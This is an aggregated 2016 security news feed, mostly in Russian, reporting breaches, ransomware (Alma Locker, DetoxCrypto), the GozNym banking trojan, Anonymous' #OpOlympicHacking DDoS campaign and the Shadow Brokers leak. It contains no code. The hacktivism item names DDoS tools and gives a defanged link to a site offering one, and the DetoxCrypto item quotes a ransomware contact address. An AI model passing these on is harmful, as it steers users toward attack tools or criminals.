    orig: 2016-08-23 14:16:05 / https://packetstormsecurity.com/files/138474/201608-msbulletin-3.txt (click post title)



    Gnome Eye Of Gnome 3.10.2 Out-Of-Bounds Write

    Gnome Eye of Gnome version 3.10.2 suffers from an out-of-bounds write vulnerability.

    orig: 2016-08-23 14:04:44 / https://packetstormsecurity.com/files/138486/gnomeye-oob.tgz (click post title)



    НПО «Эшелон» объявляет о выходе новой версии SIEM-системы «КОМРАД 2.0»!

    Группа компаний «Эшелон» представляет новую версию системы управления событиями информационной безопасности «КОМРАД 2.0». SIEM-система «КОМРАД 2.0» предназначена для выявления инцидентов информационной безопасности с помощью централизованного сбора событий и комплексного их анализа. «КОМРАД 2.0» отличается высокой производительностью, интуитивно понятным интерфейсом пользователя и значительным количеством поддерживаемых источников событий.

    «КОМРАД 2.0» поддерживает широкий набор источников событий в ИТ-инфраструктуре: операционные системы семейств Windows и Linux, различные СУБД, активное сетевое оборудование, разнообразные средства защиты информации. Отличительными особенностями решения «КОМРАД 2.0» являются поддержка отечественных СЗИ, а также возможность получать журналы событий от любого типа источника с помощью уникального универсального адаптера. Полностью поддерживается интеграция с государственной системой обнаружения, предупреждения и ликвидации последствий компьютерных атак на информационные ресурсы Российской Федерации (СОПКА).

    Серьезно переработан пользовательский интерфейс системы. Огромное количество виджетов позволяют в интуитивно понятном виде представить необходимую администратору информацию о ситуации в ИТ-инфраструктуре. Теперь правила корреляции событий создаются с помощью удобного визуального инструмента. Стал возможен графический анализ вектора компьютерной атаки.

    2

    В новой версии решения значительно увеличилась производительность SIEM-системы: количество обрабатываемых событий в секунду (EPS) достигло рекордных 20 000!

    В сентябре «КОМРАД 2.0» будет представлен на выставках «Армия 2016» и InfoSecurity Russia 2016 на стендах ГК «Эшелон».

    Онлайн-презентация «КОМРАД 2.0» состоится во вторник 30 августа в 11.00 (МСК) в формате вебинара. Для участия в вебинаре, необходимо заполнить регистрационную форму на сайте.

    Possibly Related Posts:


    orig: 2016-08-23 12:42:13 / http://s3r.ru/2016/08/novosti/npo-eshelon-obyavlyaet-o-vyihode-novoy-versii-siem-sistemyi-komrad-2-0/ (click post title)



    С форума Epic Games украдены данные 800 000 пользователей

    Представители агрегатора утечек LeakedSource сообщают, что форумы Epic Games, на которых обитает игровое сообщество Unreal Engine, Unreal Tournament, Infinity Blade, Gears of War и Bulletstorm, подверглись взлому.

    Хотя аналогичный инцидент уже имел место летом 2015 года, LeakedSource пишет, что хищение данных 808 000 пользователей – это результат новой атаки, датированной 11 августа 2016 года.

    Сообщается, что хакер, чье имя не раскрывается, сумел проникнуть на форумы Epic Games, использовав обычную SQL-инъекцию, перед которыми уязвимы старые версии платформы vBulletin. В результате злоумышленник сумел сделать полную копию дампа базы данных.

    В руки злоумышленника попала информация об именах пользователей, их email-адреса, даты рождения, полная история всех сообщений, включая личные, а также пароли и токены Facebook, если пользователь применял для входа на сайт социальную сеть, сообщает xakep.ru.

    Факт взлома уже подтвержден представителями Epic Games, в своем заявлении они пишут, что пароли пользователей форумов Unreal Engine и Unreal Tournament не были скомпрометированы и не попали в руки хакера «ни в каком виде, никаких хешей, соленых хешей или отрытого текста». Epic Games сообщает, что пароли хранились «в другом месте», так что обнуление проводиться не будет.

    Меньше повезло пользователям форумов Infinity Blade, UDK, старых игр Unreal Tournament и архивных форумов Gears of War. В их случае действительно произошла утечка соленых парольных хешей, так что теперь пострадавшим рекомендуют поменять пароли.

    Также, согласно официальному сообщению, атака не коснулась форумов Paragon, Fortnite, Shadow Complex и SpyJinx.

    Самое парадоксальное в этой истории, тот факт, что представители Epic Games не могут или не хотят учиться на собственных ошибках. В июле 2015 года форумы компании уже были скомпрометированы. Тогда хакеры тоже эксплуатировали дыру в VBulletin, и выяснилось, что до взлома компания не обновляла форумный движок несколько лет.

    Сейчас форумы Epic Games частично не работают, и администрация, очевидно, обновляет ПО. Как второй взлом скажется на безопасности форумов, можно лишь предполагать, но хотелось бы верить, что Epic Games все-таки начнет уделять внимание хотя бы своевременным апдейтам.

    orig: 2016-08-23 12:00:10 / https://www.anti-malware.ru/news/2016-08-23/20760 (click post title)



    Хакеры поднимают виртуальную машину на ПК жертвы, для скрытия атаки

    Исследователи компании SecureWorks пишут, что обнаружили на вооружении киберпреступников новую технику атак. И хотя в действительности данный способ атак вряд ли можно назвать новым и революционным, нельзя не признать, что аналитики SecureWorks столкнулись с интересным случаем.

    Эксперты обнаружили, что для сокрытия своих действий злоумышленники подняли на компьютере жертвы виртуальную машину, намереваясь действовать из-под нее.

    Аналитики SecureWorks расследовали странный инцидент, происшедший в сети одного из клиентов компании 28 июля 2016 года и вызвавший срабатывания платформы безопасности SecureWorks. Хотя на первый взгляд всё выглядело нормально, исследователи подняли логи системного администратора пострадавшей компании и обнаружили в них причину, по которой система безопасности била тревогу, пишет xakep.ru.

    «Преступники сумели получить уровень доступа, который позволял им взаимодействовать с Windows Explorer через Terminal Services Client, — объясняют специалисты. — На приведенном ниже изображении видно, что атакующие использовали Microsoftinfo-icon Management Console для запуска Hyper-V Manager, который применялся для настройки инфраструктуры виртуальной машины Microsoft».

     

     

    К счастью для пострадавшей от атаки компании, машина, которую удалось скомпрометировать атакующим, сама была виртуальной, так что осуществить задуманное злоумышленникам не удалось. Попытка подключиться к только что созданной VM посредством vmconnect.exe не увенчалась успехом по понятным причинам.

    Несмотря на это аналитики SecureWorks признают, что план нападавших был хорош. Подняв виртуальную машину и действуя из-под нее, злоумышленники могли бы укрыться от бдительного ока систем обеспечения безопасности и, к примеру, похитить секретные данные, и факт хищения данной информации мог вскрыться еще очень нескоро.

    orig: 2016-08-23 11:57:33 / https://www.anti-malware.ru/news/2016-08-23/20759 (click post title)



    Alma Locker – эффективный троян-вымогатель с C&C-сервером в сети Tor

    Уязвимости, позволяющие расшифровать файлы жертв без уплаты выкупа, пока не найдены.

    Исследователь из компании Proofpoint Дариен Хусс (Darien Huss) обнаружил новое вредоносное ПО Alma Locker, шифрующее файлы на компьютере жертвы и требующее за их восстановление выкуп в размере 1 биткойна, который должен быть уплачен в течение пяти дней.

    В последнее время было обнаружено огромное количество новых образцов троянов-шифровальщиков, однако почти все они отличаются слабой реализацией, а C&C-серверы многих из них отключены. Несмотря на наличие некоторых ошибок в реализации, Alma Locker является одной из нескольких обнаруженных недавно вымогательских программ с защищенным алгоритмом шифрования, использующей Tor в качестве рабочего C&C-сервера. Уязвимости, позволяющие расшифровать файлы жертв без уплаты выкупа, пока не найдены.

    Как сообщает Лоуренс Абрамс (Lawrence Abrams) из Bleeping Computer, Alma Locker распространяется с помощью набора эксплоитов RIG. После установки на систему вредонос генерирует для зашифрованных файлов расширение, состоящее из пяти случайных символов, и восьмизначный идентификатор жертвы. Данный идентификатор состоит из серийного номера диска C:\ и MAC-адреса первого сетевого интерфейса.

    Alma Locker шифрует файлы с помощью 128-битного шифрования и добавляет к ним сгенерированное пятизначное расширение. Например, если расширение будет .a5zfn, то после шифрования файл с именем test.jpg превратится в test.jpg.a5zfn.

    В процессе шифрования вымогатель отправляет на C&C-сервер следующую информацию: закрытый ключ шифрования, зашифрованный с помощью алгоритма AES-128, расширения файлов, имена пользователя и активного сетевого интерфейса, Locale ID и версию операционной системы, идентификатор пользователя, зарегистрированное Windows антивирусное ПО и временные метки, указывающие время запуска программы.

    После завершения процесса шифрования на экране жертвы появляется уведомление с требованием выкупа, а также ссылки на платежный сайт в сети Tor и декриптор. После запуска декриптор подключается к C&C-серверу и проверяет, был ли выплачен выкуп, какая сумма была положена на счет и уложилась ли жертва в пятидневный срок.       

    orig: 2016-08-23 11:33:28 / http://www.securitylab.ru/news/483469.php (click post title)



    Гибридный банковский троян GozNym атакует известные мировые бренды

    Операторы трояна используют новые техники, пока еще далекие от совершенства.

    Исследователи компании buguroo Threat Intelligence Labs опубликовали доклад, посвященный деятельности гибридного банковского трояна GozNym, сочетающего в себе функционал известных вредоносов Gozi и Nymaim. Троян GozNym уже был замечен в ряде различных кампаний, направленных на пользователей в США и Канаде, а затем распространившихся на Европу.

    Эксперты buguroo зафиксировали новый виток атак с использованием GozNym, в основном направленных на банки и финансовые сервисы в Испании, Польше и Японии и в ряде случаев – на пользователей из Канады, Италии и Австралии. По данным исследователей, операторы трояна используют новые техники, пока еще далекие от совершенства.

    К примеру, в Испании вредоносное ПО распространяется через вредоносные ссылки, ведущие на скомпрометированные сайты под управлением WordPress. Согласно экспертам, число жертв в этой стране значительно ниже по сравнению с показателями Польши и Японии. На момент проведения исследования серверы, использовавшиеся для распространения и управления вредоносом, были неактивны или отключены. В числе пострадавших от действий GozNym оказались известные финансовые группы и платежные системы, в частности PayPal, CitiDirect BE, ING Bank, Société Générale, BNP Paribas, Bank of Tokyo и пр.

    Как показал анализ, GozNym продолжает эволюционировать. Сейчас троян использует сложную технику динамической web-инъекции, позволяющей избежать обнаружения. Кроме того, каждый раз после обнаружения атаки операторы вредоноса модифицируют его код, что позволяет обойти защиту, установленную целевой организацией и осуществить повторную атаку.

    Когда жертва пытается провести транзакцию, троян немедленно отсылает соответствующее сообщение на C&C-сервер злоумышленников. В ответ сервер отправляет пользователю фальшивое предупреждение о необходимости ввода ключа для завершения транзакции. Жертва вводит необходимые данные и таким образом отправляет средства на счет так называемого «мула». 

    По данным исследователей, некоторые пользователи привязываются к определенному «мулу» в какой-либо стране, и операторы трояна сами решают, сколько средств будет переведено в результате транзакции. В то же время другим пользователям назначаются случайные мулы, а сумма транзакции четко фиксирована. В конечном итоге все зависит от «ценности» жертвы. Как правило, более масштабные операции привязываются к более надежным мулам, отметили исследователи.

     

    orig: 2016-08-23 11:23:12 / http://www.securitylab.ru/news/483468.php (click post title)



    [Перевод] Основные мировые события, хактивизм и #OpOlympicHacking

    Каждый, кто отслеживает интернет атаки, подтвердит: активисты, взявшие на вооружение хакерские методы — хактивисты, — получающие одобрение от тех или иных групп людей, чьи интересы ущемлены, могут добиться существенного влияния на онлайн-бизнес. Поискав по тегам #OpISIS, #OpParis, #OpMonsanto, #OpWhales, #OpKillingBay, #OpKKK и #OpTrump вы легко составите представление о широте интересов хактивистов. Любое событие, широко освещаемое прессой, сразу привлекает их внимание. Только что завершившаяся Олимпиада не стала исключением — большое количество скандалов приковало к главному спортивному событию взгляды миллионов болельщиков, злоумышленников, террористов и хактивистов. И недавние теракты в Бельгии, Франции и других странах, а также памятные события на Олимпийских играх 1972 в Мюнхене и 1996 в Атланте, вызывали немало беспокойства относительно мирного проведения «вчерашней» Олимпиады.


    Аресты подозреваемых в организации терактов на Олимпиаде 2016.

    Помимо физических угроз людям и организациям, вовлечённым в проведение различных мероприятий, а не только Олимпиады, с каждым годом растёт и угроза мощных кибератак.

    В последние годы хактивисты всё чаще устраивают свои акции, стараясь привлечь внимание общественности к тем или иным вопросам. Существует немало групп хактивистов, одной из самых крупных и известных является Anonymous. В качестве примеров проведённых ими операций можно привести:


    А за несколько месяцев до начала Олимпиады в Рио Anonymous анонсировали операцию #OpOlympicHacking.

    Мотивация
    В основе операции #OpOlympicHacking лежит социальная мотивация, как и в случае с операцией #OpWorldCup, запущенной Anonymous в той же Бразилии во время Чемпионата мира по футболу 2014. Целями этой операции стали различные правительственные организации, таким образом хактивисты протестовали против проведения чемпионата в Бразилии.

    Что касается #OpOlympicHacking, то Anonymous опубликовали следующее воззвание:

    «Привет, Рио-де-Жанейро. Мы знаем, что многие из вас понимают, какой вред наносят Олимпийские Игры этому городу. СМИ продают иллюзию того, что всё население приветствует приезжающих туристов со всего мира, многих из которых привлекает проституция и наркотики по бросовым ценам. Это фальшивое счастье скрывает кровь, проливаемую в пригородах, в основном в трущобах, благодаря бесчисленным рейдам полиции и военных под предлогом выдуманной войны. Нищета охватывает город, заставляя целые семьи покидать свои дома и привычные районы из-за роста цен на аренду или сносов, проводимых коррумпированными чиновниками в угоду строительным компаниям. Мы уже сообщали о своём отречении от проведения мега-мероприятий посреди вопиющего социального неравенства в этой стране. Но несмотря на многочисленные слова, призывы и протесты на улицах (всегда или под контролем силовиков, или грубо разгоняемые), правительство продолжает игнорировать голоса своего народа. Поэтому мы продолжим наши операции, чтобы явить миру многочисленные случаи произвола со стороны чиновников, а следовательно — врагов своего населения.»
    Также было опубликовано два видео, в которых призывали присоединяться к #OpOlympicHacking:

    Операция
    Anonymous называют себя «интернет-собранием» с «очень свободной и децентрализованной структурой управления, которая основана на идеях, а не директивах». Операция #OpOlympicHacking координировалась ячейкой Anonymous Brasil посредством Twitter, Facebook, Youtube и IRC-каналов. Все эти информационные каналы использовались для управления DDoS-атаками против конкретных целей, а также для информирования о результатах предыдущих атак и кампаний.


    Координирование операции в Twitter-аккаунте Anonymous Brasil.

    Помимо координации DDoS-атак, упомянутые площадки используются для обсуждения и стимулирования участников к поиску уязвимостей на ресурсах-жертвах.


    IRC-канал #OpOlympicHacking.

    DDoS-инструмент («opolympddos»)
    Специально для операции #OpOlympicHacking был создан программный инструмент для проведения DDoS-атак.

    Этот инструмент известен как opolympddos. Он представляет собой набор исполняемых файлов, (представляющих собой VB .NET и Python-скрипты, преобразованные в экзешники под Windows), а также batch-файлов. opolympddos позволяет всем желающим принимать участие в DDoS-атаках, для чего нужно установить TOR и кликнуть по заранее сконфигурированной кнопке, привязанной к конкретной цели. После этого запускается DDoS-атака на уровне приложения: устанавливается стабильное соединение и начинается отправка HTTP-запросов со случайными данными и user-агентами.

    Другие DDoS-инструменты
    Есть свидетельства того, что среди хактивистов распространялись и другие DDoS-инструменты, приуроченные к #OpOlympicHacking. Архив, содержащий набор «хакерских инструментов». Это набор не особо новых инструментов:
    Файл Время компиляции Описание
    Anonymous External Attack.exe 22/03/12 11:54 Инструмент для HTTP-атак. 26 антивирусов оценивают его как “HackerTool”
    Bull-dosa.exe 05/11/11 05:59 DOS-инструмент. 21 антивирусов оценивают его как “HackerTool”
    FireFlood.exe 21/01/12 22:03 DOS-инструмент. Вероятно, инструмент против виртуализации.
    LOIC.exe 13/12/14 07:09 DOS-инструмент с отслеживанием пользователей через Google Analytics.
    LOIC 2013.exe 05/01/13 07:58
    MacStartx User Attack [ tiger ].exe 26/10/13 06:14 Инструмент предложен на BR-форуме: hxxp://www.connect-trojan.net/2014/08/macstartx-user-attack-tiger-v461.html


    Инструмент LOIC.


    Python-скрипт httpdoser, распространяемый на Facebook-странице #OpOlympicHacking.

    Цели
    Лидеры Anonymous распространяли список потенциальных целей с помощью постов в Pastebin. В целом мишенями операции #OpOlympicHacking были организации, связанные со скандальными слухами касательно организации и проведения Олимпиады. Атаки
    Несколько веб-сайтов подверглись DDoS- и DoX-атакам. Согласно отчётам Anonymous, были «положены» сайты, имеющие отношение к национальным и местным правительственным и спортивным организациям.

    Кроме того, Anonymous утверждают, что им удалось украсть важные данные, принадлежавшие ряду организаций и частных лиц, имеющих отношение к Олимпийским Играм.

    Заключение
    Мощность и частота атак во время Олимпиады были ниже, чем прогнозировали эксперты RSA. Большинство атак были связаны с DDoS-активностью, выполнялись на довольно низком техническом уровне и имели ограниченные долгосрочные последствия. По завершении Олимпиады интенсивность резко снизилась, и можно ожидать очередного всплеска во время следующего крупного международного события.

    orig: 2016-08-23 11:13:11 / https://habrahabr.ru/post/308334/ (click post title)



    Review: Oxygen Forensic Complete Training

    Tuesday, August 23, 2016 (10:58:12)

    Review: Oxygen Forensic Complete Training

    Reviewed by Brad Robin

    Introduction

    This review will be based solely on the Oxygen Forensic Complete Training class that occurred in Lafayette, Louisiana between April 19-21, 2016.

    Coming into this class my knowledge of the Oxygen Forensic Detective program was very limited. I still remember calling a friend the first time I used the program and asking “Where are the pictures and videos?’ Now don’t get me wrong I have a vast knowledge of the digital forensics community and programs, however you will find that all programs are created different and the GUI interfaces can be quite tricky until you learn each. This is why I am an advocate of being trained on the software you actually use in your day to day investigations.

    Read More

    orig: 2016-08-23 10:58:12 / http://www.forensicfocus.com/News/article/sid=2717/ (click post title)



    Встреча глав BSI и Росстандарта в Лондоне

    Со стороны BSI во встрече приняли участие Директор по стандартам Скотт Стидман (Stott Steedman), Руководитель департамента внешней политикиАманда Ричардсон (Amanda Richardson), Глава департамента международных проектов Владимир Якубов (Volodymyr Yakubov), Глава департамента маркетинга и развития Дан Палмер (Dan Palmer), Генеральный директор BSI в СНГ Дмитрий Ярцев.

    В ходе встречи делегация BSI поделилась результатами исследований овлиянии стандартизации на развитие национальной промышленности и экономики, опытом по организации работы и вовлечению заинтересованных сторон при разработке британских и международных стандартов. 

    В свою очередь, делегация Росстандарта внесла предложения покоординации совместной работы в рамках ISO и IEC. В центре внимания российской стороны были также вопросы, связанные с общей структурой британской системы стандартизации и ее интеграцией в международные институты, а также, в особенности, связанные с опытом использования «британского знака качества Kitemark».

    Отдельной темой встречи, стало обсуждение инновационных стандартов, включая стандарты Smart Cities (умные города) и возможности совместного участия в разработке и реализации проектов городов будущего. Данная дисциплина прежде всего охватывает стандарты по цифровому проектированию и эксплуатации объектов (BIM – Building Information Model), хранению и обработке больших массивов данных (Big Data), взаимосвязи и взаимодействию различных устройств, образующих искусственный интеллект городов будущего (Internet of things) и оптимизации энергопотребления (Smart Greed).

    В данном контексте и Лондон и Москва прилагают значительные усилия в области инноваций городской инфраструктуры, выступая в качестве ролевых моделей городов будущего, в связи с чем не только смелые эксперименты, но и дальнейший диалог, обмен опытом и гармонизация понятий в этой области представляются предметом для согласования и стандартизации на уровне стран и континентов.

    Результаты встречи будут запротоколированы и лягут в основу очередного этапа официального и неформального сотрудничества между BSI и Росстандартом.

    В свою очередь, делегация BSI приглашена в Москву для участия в ответном визите, который намечен на октябрь этого года в преддверии генеральной ассамблеи МЭК, которая пройдет в 2017 году во Владивостоке, а также для участия в совместном праздновании 70 летнего юбилея учреждения ISO, решение о котором было принято на конференции стандартизаторов в Лондоне, проходившей в октябре 1946 года, по итогом которой было принято решение разрабатывать стандарты в международном формате на английском, русском и французском языках и которая знаменовала плодотворное сотрудничество и ведущую роль BSI и Госстандарта в рамках деятельности по международной стандартизации.

    Справка: Британский институт стандартов (British Standards Institution, BSI) является одной из старейших организаций в области стандартизации в мире. Центр Британских стандартов базируется в Лондоне и имеет широкие связи с национальными институтами стандартизации других стран. Институт является первоисточником многих европейских (EN) и международных стандартов (ISO).

    BSI имеет исключительное признание в деловых кругах. Так, статистика фондовых рынков подтверждает, что услуги обучения и сертификации BSI выбирают 75% организаций, включенных в биржевой индекс FTSE (Лондон), 43% - Fortune 500 (США), 42% - Hang Seng (Гонконг), 47% - Nikkei (Япония).

    BSI разработал более 40 тысяч стандартов.

    orig: 2016-08-23 10:05:40 / http://www.iso27000.ru/novosti-i-sobytiya/vstrecha-glav-bsi-i-rosstandarta-v-londone (click post title)



    Новый шифровальщик снимает и отправляет злоумышленникам скриншоты

    Недавно был замечен новый вид вымогателя, который распространяется в двух разных вариациях. Одна из этих вариаций, как утверждают эксперты, снимает и отсылает скриншоты с компьютера жертвы злоумышленникам.

    DetoxCrypto, новый вид вредоносной программы, как представляется, мог быть продан через Dark Web. На данный момент существуют различные варианты этого вымогателя, использующие разные темы, электронные почты и имеющие различные функции. Один из наблюдаемых вариантов действует как стандартный вымогатель (за исключением функции отсылки скриншотов), а другие маскируются под приложение PokemonGo.

    Все варианты этого вымогателя используют шифрование AES и могут останавливать функции MySQL и MSSQL на зараженных машинах, сообщает Bleeping Computer. Кроме того, во время отображения экрана блокировки и требований выкупа, зловред проигрывает аудиофайл. Вымогатель также инструктирует пользователей связаться со злоумышленниками, написав им на адрес электронной почты, указанный на экране блокировки, чтобы восстановить доступ к своим файлам.

    Исследователям пока не удалось определить, как именно распространяется этот зловред, но они утверждают, что все варианты имеют вид единственного исполняемого файла. Этот файл содержит другие исполняемые файлы и компоненты, встроенные в него. При запуске основной исполняемый извлекает файл MicrosoftHost.exe, звуковой файл, фоновые обои и исполняемый файл с разным именем для каждого варианта.

    MicrosoftHost.exe используется для шифрования и для остановки серверных процессов на компьютере жертвы. Вредоносная программа не добавляет расширение к зашифрованным файлам, но меняет фон рабочего стола.

    Второй исполняемый файл может отображать экран блокировки, проигрывать звуковой файл и может расшифровать файлы, если введен правильный пароль. Этот файл разный для каждого вида и исследователи на данный момент встречали два имени этого файла: Calipso.exe и Pokemon.exe.

    Calipso извлекает многочисленные файлы в каталог C:\Users\[account_name]\Calipso, после чего начинает шифровать файлы пользователя. После того как процесс шифрования завершен, вредоносная программа отображает экран блокировки, на котором пользователю рекомендуется связаться со злоумышленником через почту motox2016(at)mail2tor.com, чтобы получить инструкции по оплате.

    Особенность данного шифровальщика заключается в том, что он снимает скриншот активного экрана и отправляет его злоумышленнику. Исследователи считают, что если скриншот будет содержать компрометирующую информацию, злоумышленники увеличат сумму оплаты.

    Файл, распространяемый в виде Pokemongo.exe извлекает файлы в C:\Users\[account_name]\Downloads\Pokemon. Затем вредоносная программа шифрует файлы жертвы, отображая экран блокировки под названием "Мы все покемоны" (We are all Pokemons).

    orig: 2016-08-23 09:32:48 / https://www.anti-malware.ru/news/2016-08-23/20758 (click post title)



    17 сентября в Киеве пройдет четырнадцатая конференция OSDN

    17 Сентября 2016 в Киеве пройдет OSDN Conference 14.0 - ежегодная конференция разработчиков и пользователей свободного программного обеспечения. Участие в конференции - бесплатное. Место проведения конференции - "Нивки Холл" по адресу пр. Победы, 84.

    orig: 2016-08-23 09:16:32 / http://www.opennet.ru/opennews/art.shtml?num=45020 (click post title)



    Участники The Shadow Brokers пытаются выдать себя за иностранцев

    Структурные и грамматические ошибки в сообщении хакеров были допущены намеренно.

    Участники хакерской группировки The Shadow Brokers, осуществившей атаку на серверы предположительно связанной с АНБ США команды Equation Group, пытаются выдать себя за иностранцев, хотя на деле являются носителями американского английского языка. К такому выводу пришел профессор Иллинойского технологического института Шломо Аргамон (Shlomo Argamon) на основе анализа сопроводительной аннотации к массиву данных, выставленному на продажу хакерами из The Shadow Brokers.

    На первый взгляд текст был написан человеком, плохо владеющим английским языком, однако лингвист утверждает, что все грамматические и структурные ошибки допущены намеренно. В частности, в некоторых частях сообщения автор использовал корректно построенные предложения, тогда как в других при написании тех же фраз были допущены ошибки.

    «В тексте присутствует ряд различных грамматических ошибок, нехарактерных для нативных носителей американского английского языка. В то время как по отдельности ни один из этих факторов не является указующим, совокупный эффект позволяет предположить, что автор строк, скорее всего, является носителем американского английского языка, пытающегося выдать себя за иностранца, путем умышленного допущения различных грамматических ошибок», - отметил исследователь.

    По словам Аргамона, родным языком хакеров может быть славянский язык, например, русский или польский, но это маловероятно.

    За последнее время утечка архива Equation Group стала вторым инцидентом, в причастности к которому подозревают российских хакеров. По одной из теорий бывшего сотрудника Агентства национальной безопасности США Эдварда Сноудена, авторами сообщения могут быть сотрудники российских спецслужб, обнародовавшие контент C&C-сервера АНБ, взломанного в 2013 году. 

    orig: 2016-08-23 09:08:08 / http://www.securitylab.ru/news/483467.php (click post title)



    На сайте Британского института стандартов начато публичное обсуждение стандарта ISO 20614 «Протокол обмена данными для обеспечения интероперабельности и долговременной сохранности»


    С 17 августа 2016 года на сайте Британского института стандартов (BSI) выложен для публичного обсуждения проект международного стандарта ISO/DIS 20614 «Протокол обмена данными для обеспечения интероперабельности и долговременной сохранности» (Data exchange protocol for interoperability and preservation, DEPIP), см. http://drafts.bsigroup.com/Home/Details/58979  (см. также http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=68562 ). Проект объёмом 68 страниц подготовлен техническим подкомитетом Международной организации по стандартизации TC46/SC4. Текст документа доступен при условии бесплатной регистрации на сайте.

    Стандарт был разработан на базе французского стандарта NF Z44-022:2014 «Модель
    обмена данными при решении задач архивации» (Modélisation des Echanges de Données
    pour l'Archivage, MEDONA), о котором см. http://rusrim.blogspot.ru/2014/02/nf-z44-022-medona.html


    В аннотации отмечается следующее:
    «Стандарт DEPIP определяет стандартизированный порядок выполнения операций обмена различными данными (включая как сами данные, так и связанные с ними метаданные) между Архивом, его источниками комплектования и пользователями. Он также охватывает взаимодействие между архивами (включая архивы организаций, государственные архивы и поставщиков услуг хранения данных). Протокол носит общий характер и может быть адаптирован ко всем типам информации - как на традиционных носителях, так в изначально-электронной форме.

    В протоколе регламентированы 5 видов транзакций: передача на хранение (Transfer), предоставление доступа (Deliver), уничтожение (Dispose), модификация (Modify) и реституция/возврат источнику комплектования (Restitute), которые Архивы и их партнеры могут использовать для обмена объектами данных. В стандарте описана концепция реализации протокола с использованием XML-формализма для формирования сообщений, обмен которыми осуществляется в ходе выполнения транзакций (см. прилагаемую XSD-схему). Протокол определяет синтаксис и семантику таких сообщений.

    Эту информацию должны использовать разработчики приложений, способных формировать и принимать сообщения по протоколу DEPIP.
     
    Протокол DEPIP в первую очередь адресован:

    Государственные органы могут полагаться на этот стандарт в следующих вопросах:
    Содержание стандарта следующее:
    Введение
    1. Область применения
    2. Ограничения области применения
    3. Нормативные ссылки
    4. Термины и определения
    5. Контекст (здесь речь идёт о ролях, видах транзакции и объектов данных – Н.Х.)
    6. Описание транзакций на языке UML
    7. Модель внедрения
    Приложение A (справочное): Правила кодирования метаданных
    Приложение B (справочное): Адаптация стандарта к потребностям специфических сообществ пользователей
    Приложение C (справочное): Примеры сообщений, используемых при передаче и предоставлении данных
    Приложение D (справочное): Примеры сообщений в процессе авторизации
    БиблиографияИсточник: сайт Британского института стандартов / сайт ИСО
    http://drafts.bsigroup.com/Home/Details/58979

    orig: 2016-08-23 08:00:32 / http://rusrim.blogspot.com/2016/08/iso-20614.html (click post title)



    Исследователи обошли систему биометрической аутентификации, используя фото из Facebook

    Атака стала возможной благодаря потенциальным уязвимостям, присущим социальным ресурсам.

    Команда исследователей из Университета штата Северная Каролина продемонстрировали новый метод обхода систем безопасности, построенных на технологии распознавания лиц, при помощи доступных фотографий пользователей соцсетей. Как поясняется в докладе специалистов, атака стала возможной благодаря потенциальным уязвимостям, присущим социальным ресурсам.

    «Не удивительно, что личные фото, размещенные в социальных сетях, могут представлять угрозу конфиденциальности. Большинство крупных соцсетей рекомендуют пользователям установить настройки конфиденциальности при публикации фото на сайте, однако многие из этих снимков часто доступны широкой публике или могут быть просмотрены только друзьями. Кроме того, пользователи не могут самостоятельно контролировать доступность своих фото, размещенных другими подписчиками», - отмечают ученые.

    В рамках эксперимента исследователи отобрали фотографии 20 добровольцев (пользователей Facebook, Google+, LinkedIn и других социальных ресурсов). Затем они использовали данные снимки для создания трехмерных моделей лиц, «оживили» их с помощью ряда анимационных эффектов, наложили на модель текстуру кожи и откорректировали взгляд (при необходимости). Получившиеся модели исследователи протестировали на пяти системах безопасности, четыре из них удалось обмануть в 55-85% случаев.

    orig: 2016-08-23 07:30:09 / http://www.securitylab.ru/news/483466.php (click post title)



    Про резервное копирование, обязательность требований и сертификацию

    Страницы Про резервное копирование, обязательность требований и сертификацию Информация для тех, кто ценит надежность При обеспечении информационной безопасности проблемы целостности и доступности информации возникают гораздо чаще, чем проблемы обеспечения ее конфиденциальности. Связано это с тем, что конфиденциальность не требуется в отношении большого количества информационных ресурсов, в том числе созданных для неограниченного доступа, раскрытия и опубликования информации, в рекламных целях и т.д. Для таких информационных систем критичными являются именно целостность и доступность информации, реализуемые в рамках процессов обеспечения непрерывности и катастрофоустойчивости бизнеса. Наиболее важным компонентом этих процессов являются системы резервного копирования и восстановления информации. Написал большую статью про проблемы резервного копирования, требования законодательства, касающиеся этого процесса, необходимость сертификации таких средств https://go.veeam.com/wp-necessity-fstec-certified-data-backup-ru.html. В статье анализируется, какие угрозы нейтрализует системная организация резервного копирования, каким образом осуществляется государственное регулирование резервного копирования и восстановления информации, для каких видов деятельности требования к резервному копированию выдвинуты в законах и иных нормативных правовых актах, когда и почему средствам резервного копирования нужен сертификат ФСТЭК России, решает ли проблемы выполнения нормативных требований использование программ резервного копирования, включенных в единый реестр отечественного программного обеспечения.

    orig: 2016-08-23 06:25:10 / http://feedproxy.google.com/~r/blogspot/wMUFz/~3/HMuCsZTU3uk/blog-post_22.html (click post title)



    Между США и Россией разгорается новая кибервойна

    Судя по всему, кибервойна между Россией и Западом лишь набирает обороты. Хакеры, получившие доступ к "государственному набору" кибероружия США и объявившие аукцион на него, по заявлением американских экспертов, связаны с Россией, пишет издание Financial Times.

    Все началось с анонимной хакерской группировки "Теневые брокеры". Явных доказательств существования этой группы не было вплоть до прошлой субботы, когда в "Твиттере" появилась учетная запись, в которой размещалось необычное сообщение: "Теневые брокеры" объявляли, что продадут лучшие из украденных программ тому, кто предложит наивысшую цену. Часть украденных шпионских программ они обещали выложить в интернет, если удастся собрать 1 млн биткоинов (примерно $568 млн).

    Аналитики в сфере компьютерной безопасности, тщательно изучив заявление хакеров, пришли к выводу, что утверждение вполне соответствует действительности.

    Интересно, что похищенные программы находились в арсенале Equation Group - элитного хакерского подразделения Агентства национальной безопасности США. "Теневые брокеры" утверждают, что украденные программы являются сложным кибероружием, применяемым АНБ. Мотивы группировки в данном случае не совсем ясны.

    "Если бы у них были финансовые мотивы, они точно не поступили бы таким образом. Скорее всего, тут дело не в материальной выгоде. Это пиар", - отметила Орла Кокс, директор службы компьютерной безопасности Symantecinfo-icon.

    Кибероружие, как правило, продается на черном интернет-рынке или используется злоумышленниками, которые желают остаться неизвестными. Три компании, специализирующиеся на кибербезопасности, заявили, что "Теневые брокеры", скорее всего, работают на российскую разведку. В пользу этого говорит не одно косвенное доказательство, отметил аналитики, пишет vestifinance.ru.

    "Тот факт, что "Теневые брокеры" не существовали ранее, а появились недавно и применяют накопленные за долгое время технологии, наводит на мысль, что все это часть некой целенаправленной деятельности. Скорее всего, основной целью здесь является показать лицемерие США", - отметил Эван Лоусон, старший научный сотрудник интеллектуального центра RUSI, добавив, что Россия в этом деле является очевидным преступником.

